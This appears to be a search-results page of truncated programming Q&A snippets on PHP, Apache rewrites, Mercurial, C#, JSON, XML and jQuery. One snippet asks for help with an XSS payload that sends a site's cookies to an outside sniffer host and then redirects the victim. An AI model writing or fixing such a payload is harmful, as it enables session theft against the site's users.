Search Results

Search found 62215 results on 2489 pages for 'http basic authentication'.


  • Simplest way to convert all html links in a string using PHP

    - by Gaz
    I am trying to convert a block of text that contains html text - i'd like to find all http links and convert them for link tracking purposes. So eg anything like this in a string would be converted to the latter <a href="http://www.google.com">Some Link</a> <a href="http://www.mysite.com/tracking.php?url=www.google.com">Some Link</a> Can anyone how to do this taking into account the original string will consists of all sorts of html, images etc..

    Read the article

  • Are there any good books to learn C++ if you already know Java and C#

    - by JF LR
    Hi, I would like to know if you have any good books that teach C++ programming without repeating the basics. I already know Java and C# well, and I have basic knowledge of C and assembly, so I understand a bit about pointer arithmetic, manual memory management and heap-based allocation. I was looking at O'Reilly's C++ in a Nutshell and was wondering whether that book would be a good choice. Thank you.

    Read the article

  • double slash apache configuration

    - by VP
    Hi, I'm deploying a Rails application and I need to rewrite the URL (in Apache) to add a www prefix and a trailing / to the end of the URL, so I took the following approach:

        RewriteCond %{REQUEST_URI} ^/[^\.]+[^/]$
        RewriteRule ^(.*)$ http://%{HTTP_HOST}/$1/ [R=301,L]
        RewriteCond %{HTTP_HOST} ^foo\.com
        RewriteRule ^(.*)$ http://www.foo.com/$1 [R=301,L]

    The problem is that this appends a double slash to my URL, so for example the resource /question/ask becomes:

        http://foo.com//question/ask

    I tried adding the following rule before all my rewrite rules to try to remove the double //:

        RewriteCond %{REQUEST_URI} ^//
        RewriteRule ([^/]*)/+(.*) http://www.foo.com/$1/$2 [R=301,L]

    but it didn't work. Any idea how to strip the extra "//" added to the URL?

    Read the article

  • mercurial hg - pushing to a cloned repository via Apache errors with "repository is unrelated"

    - by Ash
    Two scenarios, one of which works and one of which doesn't, when both should.

    Scenario #1 (does NOT work, via Apache): on the server there are two repos, repo A and repo B, where B was cloned from A via http://SERVER/HG/A. On the client, repo A was cloned from http://SERVER/HG/A and repo B from http://SERVER/HG/B. Adding a file to repo A on the client, committing and pushing it up to http://SERVER/HG/A works. Adding a file to repo B on the client, committing and pushing it up to http://SERVER/HG/B fails with "abort: repository is unrelated"; the push only works if I force it with -f.

    Scenario #2 (works, via the file system): on the server there are repo A and repo B, where B was cloned from E:/HG/A. On the client, repo A was cloned from E:/HG/A and repo B from E:/HG/B. Adding a file to repo A on the client, committing and pushing it up to E:/HG/A works, and adding a file to repo B, committing and pushing it up to E:/HG/B also works.

    Conclusion: something in the Apache configuration, or in the integration between Apache and Mercurial, is making the repo "unrelated". Any ideas? Why do I need to force the push in the first scenario but not in the second? I tried both scenarios via TortoiseHg as well as the command line.

    Read the article

  • Automatically hyper-link URLs and emails using C#, whilst leaving bespoke tags in place

    - by marcusstarnes
    I have a site that enables users to post messages to a forum. At present, if a user types a web address or email address and posts it, it's treated the same as any other piece of text. There are tools that enable the user to supply hyperlinked web and email addresses (via some bespoke tags/markup); these are sometimes used, but not always. In addition, a bespoke 'Image' tag can be used to reference images hosted on the web. My objective is to cater both for those who use the existing tools to generate hyperlinked addresses, and for those who simply type a web or email address in, by automatically converting the latter to a hyperlinked address as soon as they submit their post. I've found one or two regular expressions that convert a plain-string web or email address; however, I obviously don't want to perform any manipulation on addresses that are already handled via the site's bespoke tagging, and that's where I'm stuck: how to EXCLUDE any web or email addresses that are already catered for via the bespoke tagging, leaving them as is. Here are some examples of bespoke tagging for the variations that need to be left alone:

        [URL=www.msn.com]www.msn.com[/URL]
        [URL=http://www.msn.com]http://www.msn.com[/URL]
        [[email protected]][email protected][/EMAIL]
        [IMG]www.msn.com/images/test.jpg[/IMG]
        [IMG]http://www.msn.com/images/test.jpg[/IMG]

    The following examples, however, would ideally be converted automatically into web and email links respectively:

        www.msn.com
        http://www.msn.com
        [email protected]

    Ideally, the 'converted' links would just have the appropriate bespoke tags applied to them as per the initial examples earlier in this post, so rather than <a href="..." etc. they'd become [URL=http://www.. etc. Unfortunately, we have a LOT of historic data stored with this bespoke tagging throughout, so for now we'd like to retain that rather than implementing an entirely new way of storing our users' posts. Any help would be much appreciated. Thanks.
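    A minimal Python sketch of the "protect the bespoke spans first, then linkify what's left" idea (the question is C#, so this only illustrates the approach; the regexes and the [URL] output format follow the examples above and would need extending to cover [EMAIL]):

        import re

        # Bespoke spans such as [URL=...]...[/URL] or [IMG]...[/IMG] must be left untouched.
        PROTECTED = re.compile(r'\[(URL|EMAIL|IMG)[^\]]*\].*?\[/\1\]', re.IGNORECASE | re.DOTALL)
        # Bare web addresses typed directly into the post body.
        BARE_URL = re.compile(r'\b(?:https?://|www\.)[^\s\[\]<>"]+', re.IGNORECASE)

        def wrap(match):
            url = match.group(0)
            return "[URL=" + url + "]" + url + "[/URL]"

        def linkify(text):
            out, pos = [], 0
            for m in PROTECTED.finditer(text):
                out.append(BARE_URL.sub(wrap, text[pos:m.start()]))  # linkify the gap
                out.append(m.group(0))                               # keep the bespoke span as-is
                pos = m.end()
            out.append(BARE_URL.sub(wrap, text[pos:]))
            return "".join(out)

        print(linkify("See [URL=http://www.msn.com]http://www.msn.com[/URL] and also www.msn.com"))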

    Read the article

  • Should I use the Model-View-ViewModel (MVVM) pattern in Silverlight projects?

    - by Jon Galloway
    One challenge with Silverlight controls is that when properties are bound to code, they're no longer really editable in Blend. For example, if you've got a ListView that's populated from a data feed, there are no elements visible when you edit the control in Blend. I've heard that the MVVM pattern, which originated in the WPF development community, can also help with keeping Silverlight controls "blendable". I'm still wrapping my head around it, but here are some explanations:

        http://www.nikhilk.net/Silverlight-ViewModel-Pattern.aspx
        http://mark-dot-net.blogspot.com/2008/11/model-view-view-model-mvvm-in.html
        http://www.ryankeeter.com/silverlight/silverlight-mvvm-pt-1-hello-world-style/
        http://jonas.follesoe.no/YouCardRevisitedImplementingTheViewModelPattern.aspx

    One potential downside is that the pattern requires additional classes, although not necessarily more code (as shown by the second link above). Thoughts?

    Read the article

  • How to set up Solr on a live VPS?

    - by user342960
    I followed the instructions at http://lucene.apache.org/solr/tutorial.html and I can set up Solr on my PC. Now that I've come to my VPS I cannot get past this step:

        $ java -jar start.jar

    After running that command, the search service is available at http://x.x.x.x:8983/solr/select. But whenever I close the SSH client, the service at http://x.x.x.x:8983/solr/select also shuts down, so I can't search any more. What should I do? Thanks for any help.

    Read the article

  • How to Declare Complex Nested C# Type for Web Service

    - by TheArtTrooper
    I would like to create a service that accepts a complex nested type. In a sample .asmx file I created:

        [WebService(Namespace = "http://tempuri.org/")]
        [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
        // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line.
        // [System.Web.Script.Services.ScriptService]
        public class ServiceNest : System.Web.Services.WebService
        {
            public class Block
            {
                [XmlElement(IsNullable = false)]
                public int number;
            }

            public class Cell
            {
                [XmlElement(IsNullable = false)]
                public Block block;
            }

            public class Head
            {
                [XmlElement(IsNullable = false)]
                public Cell cell;
            }

            public class Nest
            {
                public Head head;
            }

            [WebMethod]
            public void TakeNest(Nest nest)
            {
            }
        }

    When I view the .asmx file in IE, the test page shows the example SOAP POST request as:

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <TakeNest xmlns="http://schemas.intellicorp.com/livecompare/">
              <nest>
                <head>
                  <cell>
                    <block xsi:nil="true" />
                  </cell>
                </head>
              </nest>
            </TakeNest>
          </soap:Body>
        </soap:Envelope>

    It hasn't expanded <block> into its number member. Looking at the WSDL, the types all look good. So is this just a limitation of the post demo page creator? Thanks.

    Read the article

  • Parsing dbpedia JSON in Python

    - by givp
    Hello, I'm trying to get my head around the dbpedia JSON schema and can't figure out an efficient way of extracting a specific node. This is what dbpedia gives me: http://dbpedia.org/data/Ceramic_art.json. I've got the whole thing as a JSON object in Python but don't really understand how to get the English abstract from this data. I've gotten this far:

        u = "http://dbpedia.org/data/Ceramic_art.json"
        data = urlfetch.fetch(url=u)
        json_data = json.loads(data.content)
        for j in json_data["http://dbpedia.org/resource/Ceramic_art"]:
            if j == "http://dbpedia.org/ontology/abstract":
                print "it's here"

    Not sure how to proceed from here. As you can see there are multiple languages, and I need to get the English abstract. Thanks for your help, g
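    One possible next step, sketched with the standard library rather than App Engine's urlfetch, and assuming each abstract entry in the dbpedia output is an object carrying "lang" and "value" keys (worth verifying against the actual feed):

        import json
        import urllib.request

        url = "http://dbpedia.org/data/Ceramic_art.json"
        with urllib.request.urlopen(url) as resp:
            data = json.load(resp)

        # The abstract property maps to a list of per-language entries.
        abstracts = data["http://dbpedia.org/resource/Ceramic_art"]["http://dbpedia.org/ontology/abstract"]
        english = next((a["value"] for a in abstracts if a.get("lang") == "en"), None)
        print(english)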

    Read the article

  • How do I parse an XML page to output its data pieces the way I want?

    - by ida
    Here is the page I want to parse (the API link I gave is just a dev test, so it's OK for it to be public):

        http://api.scribd.com/api?method=docs.getList&api_key=2apz5npsqin3cjlbj0s6m

    The output I'm looking for is something like this (for now):

        Doc_id: 29638658
        access_key: key-11fg37gwmer54ssq56l3
        secret_password: 1trinfqri6cnv3gf6rnl
        title: Sample
        description: k
        thumbnail_url: http://i6.scribdassets.com/public/images/uploaded/152418747/xTkjCwQaGf_thumbnail.jpeg
        page_count: 100

    I've tried everything I can find on the internet but nothing works well. I have this one script:

        <?php
        $xmlDoc = new DOMDocument();
        $xmlDoc->load("http://api.scribd.com/api?method=docs.getList&api_key=2apz5npsqin3cjlbj0s6m");
        $x = $xmlDoc->documentElement;
        foreach ($x->childNodes AS $item) {
            print $item->nodeName . " = " . $item->nodeValue;
        }
        ?>

    Its output comes out like this:

        #text = resultset = 29638658 key-11fg37gwmer54ssq56l3 1trinfqri6cnv3gf6rnl Sample k http://i6.scribdassets.com/public/images/uploaded/152418747/xTkjCwQaGf_thumbnail.jpeg DONE 100 29713260 key-18a9xret4jf02129vlw8 25fjsmmvl62l4cbwd1vq book2 description bla bla http://i6.scribdassets.com/public/images/uploaded/153065528/oLVqPZMu3zhsOn_thumbnail.jpeg DONE 7 #text =

    I need major help; I'm really stuck and don't know what to do. Please help me. Thanks.

    Read the article

  • JQuery Cycle, how can I change from image to div?

    - by vick
        <!doctype html>
        <html>
        <head>
          <title>JQuery Cycle Plugin - Example Slideshow</title>
          <style type="text/css">
            .slideshow { height: 232px; width: 232px; margin: auto }
            .slideshow img { padding: 15px; border: 1px solid #ccc; background-color: #eee; }
          </style>
          <!-- include jQuery library -->
          <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
          <!-- include Cycle plugin -->
          <script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.74.js"></script>
          <!-- initialize the slideshow when the DOM is ready -->
          <script type="text/javascript">
            $(document).ready(function() {
              $('.slideshow').cycle({
                fx: 'shuffle' // choose your transition type, ex: fade, scrollUp, shuffle, etc...
              });
            });
          </script>
        </head>
        <body>
          <div class="slideshow">
            <img src="http://cloud.github.com/downloads/malsup/cycle/beach1.jpg" width="200" height="200" />
            <img src="http://cloud.github.com/downloads/malsup/cycle/beach2.jpg" width="200" height="200" />
            <img src="http://cloud.github.com/downloads/malsup/cycle/beach3.jpg" width="200" height="200" />
          </div>
        </body>
        </html>

    How can I make this exact scroller work with divs instead of img? Basically, I want to use

        <div> etc etc etc </div>

    instead of:

        <img src="http://cloud.github.com/downloads/malsup/cycle/beach3.jpg" width="200" height="200" />

    Read the article

  • Double Slash at end of URL when going to HTTPS?

    - by J M 4
    My site currently uses http and https sections based on the data being collected (form data uses https). On my index page, I have this PHP code at the top:

        <?php
        session_start();
        ob_start();
        if ($_SERVER['SERVER_PORT'] == 443) {
            header('Location:http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']));
            die();
        }
        ?>

    However, the page will not load and I get a 404 error. Similarly, when I visit the sections with https security, using this code in the head:

        <?php
        session_start();
        ob_start();
        if ($_SERVER['SERVER_PORT'] == 80) {
            header('Location:https://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']).'/'.basename($_SERVER['PHP_SELF']));
            die();
        }
        ?>

    the site does not respond AND, for some reason, a double slash is created when switching from http to https. Example: starting from http://www.abc.com/, clicking a button which should route to enroll.php shows http://www.abc.com//enroll.php. Why the double slash, and can anybody help with the 404 errors?
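    One place the extra slash can come from, illustrated with Python's posixpath (an illustration of the path arithmetic only, not the poster's code): when the script lives at the document root, dirname() already returns "/", so concatenating another "/" before the basename produces "//".

        import posixpath

        self_path = "/enroll.php"                   # what PHP_SELF looks like at the document root
        prefix = posixpath.dirname(self_path)       # "/"
        rebuilt = prefix + "/" + posixpath.basename(self_path)
        print(rebuilt)                              # prints "//enroll.php", the doubled slash

        # Joining instead of blindly concatenating avoids the duplicate:
        print(posixpath.join(prefix, posixpath.basename(self_path)))   # "/enroll.php"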

    Read the article

  • Why are illegal cookies sent by browsers and accepted by web servers (RFC 2109)?

    - by Artyom
    Hello, according to RFC 2109 a cookie's value can be either an HTTP token or a quoted string, and a token can't include non-ASCII characters. Cookie RFC 2109: http://tools.ietf.org/html/rfc2109#page-3; HTTP RFC 2068 token definition: http://tools.ietf.org/html/rfc2068#page-16. However, I have found that the Firefox browser (3.0.6) sends cookies containing a UTF-8 string as-is, and the three web servers I tested (Apache 2, lighttpd, nginx) pass this string as-is to the application. For example, the raw request from the browser:

        $ nc -l -p 8080
        GET /hello HTTP/1.1
        Host: localhost:8080
        User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.9) Gecko/2009050519 Firefox/2.0.0.13 (Debian-3.0.6-1)
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 300
        Connection: keep-alive
        Cookie: wikipp=1234; wikipp_username=??????
        Cache-Control: max-age=0

    And the raw HTTP_COOKIE CGI variable reported by Apache, nginx and lighttpd:

        wikipp=1234; wikipp_username=??????

    What am I missing? Can somebody explain this to me?
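    A common way applications stay inside the RFC's token rules is to percent-encode the value before it is set and decode it again when it comes back, so only ASCII ever travels in the header; a small Python sketch of that idea (not part of the original question, and the value shown is hypothetical):

        from urllib.parse import quote, unquote

        username = "emäil-usér"                   # hypothetical non-ASCII value
        cookie_value = quote(username, safe="")   # ASCII-only percent-encoded form
        print("Set-Cookie: wikipp_username=" + cookie_value)

        # When the Cookie header comes back, reverse the encoding:
        print(unquote(cookie_value))              # original value restored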

    Read the article

  • Some useful 3rd party APIs for J2ME

    - by Vivart
    Fixed-point integer math: MathFP.

    kSOAP is a SOAP web service client library for constrained Java environments such as Applets or J2ME applications (CLDC / CDC / MIDP): http://sourceforge.net/projects/ksoap2/

    kXML is a lean common XML API with namespace and WAP support that is intended to fit into the Java KVM for limited devices like the Palm Pilot: http://sourceforge.net/projects/kxml/

    UI libraries: https://lwuit.dev.java.net/ and http://www.j2mepolish.org/cms/

    Read the article

  • How to Redirect Folder with 404 .htaccess - without httpd.conf?

    - by elmaso
    Hello, I have no access to httpd.conf. How can I redirect users when they type one folder too many, like http://www.example.com/folder/folder2/, i.e. return a 404 or redirect to the main page? Users should only have access to the root http://www.example.com/link+custom1+custom2/, and if they type something like http://www.example.com/link+custom1+custom2/onemorefolder/orTwo/ they should be redirected. How can I do that with .htaccess only, without PHP?

    Read the article

  • Google Chrome does not honor cache-policy in page header if the page is displayed in a FRAME

    - by Tim
    No matter what I do:

        <meta http-equiv="Cache-Control" content="no-cache" />
        <meta http-equiv="Expires" content="Fri, 30 Apr 2010 11:12:01 GMT" />
        <meta http-equiv="Expires" content="0" />
        <HTTP-EQUIV="PRAGMA" CONTENT="NO-STORE" />

    Google Chrome does not reload any page according to the page's internal cache policy if the page is displayed in a frame. It is as though the meta tags are not even there; Google Chrome seems to be ignoring them. Since I've gotten answers to this question on other forums where the person responding has ignored the operative condition, I will repeat it: this behavior occurs when the page is displayed in a frame. I was using the latest released version and have since upgraded to 5.0.375.29 beta, but the behavior is the same in both versions. Would someone please confirm, one way or another, the behavior you are seeing with framesets and the caching/expiration policies given in meta tags? Thanks.
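    For comparison, cache policy set in the HTTP response headers (rather than in the markup) applies to a document however it is loaded, frames included; below is a minimal Python sketch of a server sending such headers, offered only as an illustration and unrelated to the poster's setup.

        from http.server import BaseHTTPRequestHandler, HTTPServer

        class NoCacheHandler(BaseHTTPRequestHandler):
            def do_GET(self):
                body = b"<html><body>fresh on every load</body></html>"
                self.send_response(200)
                self.send_header("Content-Type", "text/html")
                # The cache policy travels as real response headers here.
                self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
                self.send_header("Pragma", "no-cache")
                self.send_header("Expires", "0")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

        if __name__ == "__main__":
            HTTPServer(("localhost", 8000), NoCacheHandler).serve_forever()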

    Read the article

  • Nested hyperlinks in XHTML 1.1 document

    - by Nazgulled
    Hi, I'm writing a simple widget for WordPress that fetches the most recent tweets from the RSS feed provided by Twitter. This widget parses any link posted in a tweet; it also parses mentions (i.e. @username) and trending topics (i.e. #nowplaying). For these three situations it creates links pointing to some Twitter feature. For instance:

        "Hi @UserA, check out the song Foo from FooBar that I'm listening, it's awesome. #nowplaying"

    is parsed into this:

        Hi <a href="http://twitter.com/UserA">@UserA</a>, check out the song Foo from FooBar that I'm listening, it's awesome. <a href="http://twitter.com/#search?q=nowplaying">#nowplaying</a>

    Now I need to add a global link to the whole message, like this:

        <a href="http://twitter.com/UserA/statuses/1234567890">
          Hi <a href="http://twitter.com/UserA">@UserA</a>, check out the song Foo from FooBar that I'm listening, it's awesome. <a href="http://twitter.com/#search?q=nowplaying">#nowplaying</a>
        </a>

    But this code does not validate, and it doesn't work anyway (browsers don't really seem to know what to do with it). Any suggestions on how I could fix this?

    Read the article

  • Parse XML document

    - by Neil
    I am trying to parse a remote XML document (from Amazon AWS): <ItemLookupResponse xmlns="http://webservices.amazon.com/AWSECommerceService/2009-03-31"> <OperationRequest> <RequestId>011d32c5-4fab-4c7d-8785-ac48b9bda6da</RequestId> <Arguments> <Argument Name="Condition" Value="New"></Argument> <Argument Name="Operation" Value="ItemLookup"></Argument> <Argument Name="Service" Value="AWSECommerceService"></Argument> <Argument Name="Signature" Value="73l8oLJhITTsWtHxsdrS3BMKsdf01n37PE8u/XCbsJM="></Argument> <Argument Name="MerchantId" Value="Amazon"></Argument> <Argument Name="Version" Value="2009-03-31"></Argument> <Argument Name="ItemId" Value="603084260089"></Argument> <Argument Name="IdType" Value="UPC"></Argument> <Argument Name="AWSAccessKeyId" Value="[myAccessKey]"></Argument> <Argument Name="Timestamp" Value="2010-06-14T15:03:27Z"></Argument> <Argument Name="ResponseGroup" Value="OfferSummary,ItemAttributes"></Argument> <Argument Name="SearchIndex" Value="All"></Argument> </Arguments> <RequestProcessingTime>0.0318510000000000</RequestProcessingTime> </OperationRequest> <Items> <Request> <IsValid>True</IsValid> <ItemLookupRequest> <Condition>New</Condition> <DeliveryMethod>Ship</DeliveryMethod> <IdType>UPC</IdType> <MerchantId>Amazon</MerchantId> <OfferPage>1</OfferPage> <ItemId>603084260089</ItemId> <ResponseGroup>OfferSummary</ResponseGroup> <ResponseGroup>ItemAttributes</ResponseGroup> <ReviewPage>1</ReviewPage> <ReviewSort>-SubmissionDate</ReviewSort> <SearchIndex>All</SearchIndex> <VariationPage>All</VariationPage> </ItemLookupRequest> </Request> <Item> <ASIN>B0000UTUNI</ASIN> <DetailPageURL>http://www.amazon.com/Garnier-Fructis-Fortifying-Conditioner-Minute/dp/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB0000UTUNI</DetailPageURL> <ItemLinks> <ItemLink> <Description>Technical Details</Description> <URL>http://www.amazon.com/Garnier-Fructis-Fortifying-Conditioner-Minute/dp/tech-data/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Add To Baby Registry</Description> <URL>http://www.amazon.com/gp/registry/baby/add-item.html%3Fasin.0%3DB0000UTUNI%26SubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Add To Wedding Registry</Description> <URL>http://www.amazon.com/gp/registry/wedding/add-item.html%3Fasin.0%3DB0000UTUNI%26SubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Add To Wishlist</Description> <URL>http://www.amazon.com/gp/registry/wishlist/add-item.html%3Fasin.0%3DB0000UTUNI%26SubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>Tell A Friend</Description> <URL>http://www.amazon.com/gp/pdp/taf/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> <ItemLink> <Description>All Customer Reviews</Description> <URL>http://www.amazon.com/review/product/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> 
<ItemLink> <Description>All Offers</Description> <URL>http://www.amazon.com/gp/offer-listing/B0000UTUNI%3FSubscriptionId%3DAKIAIYPTKHCWTRWWPWBQ%26tag%3Dws%26linkCode%3Dxm2%26camp%3D2025%26creative%3D386001%26creativeASIN%3DB0000UTUNI</URL> </ItemLink> </ItemLinks> <ItemAttributes> <Binding>Health and Beauty</Binding> <Brand>Garnier</Brand> <EAN>0603084260089</EAN> <Feature>Helps restore strength and shine</Feature> <Feature>Penetrates deep to nourish, repair and rejuvenate</Feature> <Feature>Makes hair softer and more manageable without weighing it down</Feature> <ItemDimensions> <Weight Units="hundredths-pounds">40</Weight> </ItemDimensions> <Label>Garnier</Label> <ListPrice> <Amount>419</Amount> <CurrencyCode>USD</CurrencyCode> <FormattedPrice>$4.19</FormattedPrice> </ListPrice> <Manufacturer>Garnier</Manufacturer> <NumberOfItems>1</NumberOfItems> <ProductGroup>Health and Beauty</ProductGroup> <ProductTypeName>ABIS_DRUGSTORE</ProductTypeName> <Publisher>Garnier</Publisher> <Size>5.0 oz</Size> <Studio>Garnier</Studio> <Title>Garnier Fructis Fortifying Fortifying Deep Conditioner, 3 Minute Masque - 5 oz</Title> <UPC>603084260089</UPC> </ItemAttributes> <OfferSummary> <LowestNewPrice> <Amount>229</Amount> <CurrencyCode>USD</CurrencyCode> <FormattedPrice>$2.29</FormattedPrice> </LowestNewPrice> <TotalNew>7</TotalNew> <TotalUsed>0</TotalUsed> <TotalCollectible>0</TotalCollectible> <TotalRefurbished>0</TotalRefurbished> </OfferSummary> </Item> </Items> </ItemLookupResponse> I am trying to extract data from the XML stream using XPathDocument, but with no luck: WebRequest request = HttpWebRequest.Create(url); WebResponse response = request.GetResponse(); //XmlDocument doc = new XmlDocument(); XPathDocument Doc = new XPathDocument(response.GetResponseStream()); XPathNavigator nav = Doc.CreateNavigator(); XPathNodeIterator ListPrice = nav.Select("/ItemLookupResponse/Items/Item/ItemAttributes/ListPrice"); foreach (XPathNavigator node in ListPrice) { Response.Write(node.GetAttribute("Amount", NAMESPACE)); } What am I missing? Thanks in advance!!
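    Worth noting: the response document declares a default namespace (http://webservices.amazon.com/AWSECommerceService/2009-03-31), so namespace-unaware XPath expressions such as /ItemLookupResponse/Items/Item/... will not match anything. Here is a small namespace-aware sketch in Python rather than C#, purely to illustrate the point (the file name is hypothetical):

        import xml.etree.ElementTree as ET

        # The Amazon response uses a default namespace, so lookups must be qualified.
        NS = {"aws": "http://webservices.amazon.com/AWSECommerceService/2009-03-31"}

        root = ET.parse("response.xml").getroot()   # hypothetical saved copy of the response

        for price in root.findall(".//aws:ItemAttributes/aws:ListPrice", NS):
            amount = price.find("aws:Amount", NS)
            currency = price.find("aws:CurrencyCode", NS)
            print(amount.text, currency.text)       # e.g. 419 USD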

    Read the article

  • Xss redirect and cookies

    - by user1824906
    I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection I tried to put "><script src='http://site.ru/1.js' /></script>" http://site.ru/1.js contains: img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie; var URL = "http://images.cards.mail.ru/11bolprivet.jpg" var speed = 100; function reload() { document.location = URL } setTimeout("reload()", speed); But it doesn't work=\ Any help?

    Read the article

  • gcc, strict-aliasing, and casting through a union

    - by Joseph Quinsey
    About a year ago the following paragraph was added to the GCC Manual, version 4.3.4, regarding -fstrict-aliasing:

        Similarly, access by taking the address, casting the resulting pointer and dereferencing the result has undefined behavior [emphasis added], even if the cast uses a union type, e.g.:

        union a_union {
            int i;
            double d;
        };

        int f() {
            double d = 3.0;
            return ((union a_union *)&d)->i;
        }

    Does anyone have an example to illustrate this undefined behavior? Note this question is not about what the C99 standard says, or does not say. It is about the actual functioning of gcc, and other existing compilers, today. My simple, naive attempt fails. For example:

        #include <stdio.h>

        union a_union {
            int i;
            double d;
        };

        int f1(void) {
            union a_union t;
            t.d = 3333333.0;
            return t.i;                        // gcc manual: 'type-punning is allowed, provided ...'
        }

        int f2(void) {
            double d = 3333333.0;
            return ((union a_union *)&d)->i;   // gcc manual: 'undefined behavior'
        }

        int main(void) {
            printf("%d\n", f1());
            printf("%d\n", f2());
            return 0;
        }

    works fine, giving on CYGWIN:

        -2147483648
        -2147483648

    Also note that taking addresses is obviously wrong (or right, if you are trying to illustrate undefined behavior). For example, just as we know this is wrong:

        extern void foo(int *, double *);

        union a_union t;
        t.d = 3.0;
        foo(&t.i, &t.d);   // UD behavior

    so is this wrong:

        extern void foo(int *, double *);

        double d = 3.0;
        foo(&((union a_union *)&d)->i, &d);   // UD behavior

    For background discussion about this, see for example:

        http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1422.pdf
        http://gcc.gnu.org/ml/gcc/2010-01/msg00013.html
        http://davmac.wordpress.com/2010/02/26/c99-revisited/
        http://cellperformance.beyond3d.com/articles/2006/06/understanding-strict-aliasing.html
        http://stackoverflow.com/questions/98650/what-is-the-strict-aliasing-rule
        http://stackoverflow.com/questions/2771023/c99-strict-aliasing-rules-in-c-gcc/2771041#2771041

    The first link, draft minutes of an ISO meeting seven months ago, notes in section 4.16: "Is there anybody that thinks the rules are clear enough? No one is really able to interpret them."

    Read the article

  • Problem with sending cookies with file_get_contents

    - by Ikke
    Hi, I'm trying to get the contents of another file with file_get_contents (don't ask why). I have two files: test1.php and test2.php. test1.php returns a string based on the user that is logged in. test2.php tries to get the contents of test1.php and is executed by the browser, so it has the cookies. To send the cookies with file_get_contents, I create a stream context:

        $opts = array('http' => array('header' => 'Cookie: ' . $_SERVER['HTTP_COOKIE'] . "\r\n"));

    I'm retrieving the contents with:

        $contents = file_get_contents("http://www.domain.com/test1.php", false, $opts);

    But now I get the error:

        Warning: file_get_contents(http://www.domain.com/test1.php) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found

    Does somebody know what I'm doing wrong here? Edit: forgot to mention that without the stream context the page just loads, but without the cookies I don't get the info I need.
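    The underlying pattern, forwarding the browser's Cookie header on the internal request, looks like this in Python (a sketch only; the hostname is the placeholder from the question, and a CGI-style HTTP_COOKIE environment variable is assumed):

        import os
        import urllib.request

        incoming_cookies = os.environ.get("HTTP_COOKIE", "")    # cookies the browser sent us

        req = urllib.request.Request(
            "http://www.domain.com/test1.php",                  # placeholder host from the question
            headers={"Cookie": incoming_cookies},               # forward them on the sub-request
        )
        with urllib.request.urlopen(req) as resp:
            contents = resp.read().decode("utf-8", errors="replace")
        print(contents)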

    Read the article

  • JavaScript: How can I delay running some JS code until my JS file downloaded?

    - by Henryh
    I have the following code:

        <script type="text/javascript">
        function addScript(url) {
            var script = document.createElement('script');
            script.src = url;
            document.getElementsByTagName('head')[0].appendChild(script);
        }

        addScript('http://example.com/One.js');
        addScript('http://example.com/Two.js');
        addScript('http://example.com/Three.js');
        addScript('http://example.com/Four.js');
        ...
        // run code below this point once Two.js has been downloaded and executed
        </script>

    How can I detect when one of my JavaScript files has been downloaded and executed so that I can use it?

    Read the article

  • jQuery AJAX vs browser URL

    - by danwoods
    Hello all, I'm trying to use YouTube's API to bring back a listing of a user's videos. The request URL looks something like this, with 'username' being the actual username:

        http://gdata.youtube.com/feeds/api/users/username/uploads

    Visiting that URL in the browser brings back the appropriate feed. However, when I try to access the URL via jQuery's $.ajax or $.get functions, using something like:

        $.ajax({
            // set parameters
            url: "http://gdata.youtube.com/feeds/api/users/username/uploads",
            type: "GET",
            // on success
            success: function (data) {
                alert("xml successfully captured\n\n" + data);
            },
            // on error
            error: function (XMLHttpRequest, textStatus, errorThrown, data) {
                alert(" We're sorry, there seem to be a problem with our connection to youtube.\nYou can access all our videos here: http://www.youtube.com/user/username");
                alert(data);
            }
        });

        $.get("http://gdata.youtube.com/feeds/api/users/username/uploads", function(data) {
            alert("Data Loaded: " + data);
        });

